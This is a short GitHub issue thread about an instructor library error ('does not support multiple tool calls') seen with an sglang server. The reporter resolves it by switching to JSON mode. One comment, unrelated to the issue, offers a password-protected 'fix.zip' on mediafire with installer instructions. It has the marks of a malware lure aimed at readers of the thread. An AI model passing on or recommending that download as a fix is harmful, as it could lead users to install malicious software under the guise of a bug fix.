### ISSUE TITLE
can not support sglang server 

### ISSUE THREAD

**Issue by colinsongf** [jxnl/instructor#954]
function_calls.py", line 315, in parse_tools
    len(message.tool_calls or []) == 1
AssertionError: Instructor does not support multiple tool calls, use List[Model] instead.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ivanleomk** [comment]
@colinsongf can you provide a code snippet of the response object you're looking at?

**Comment by colinsongf** [comment]
the problem is solved by 
instructor.from_openai(OpenAI(), mode=instructor.Mode.JSON)
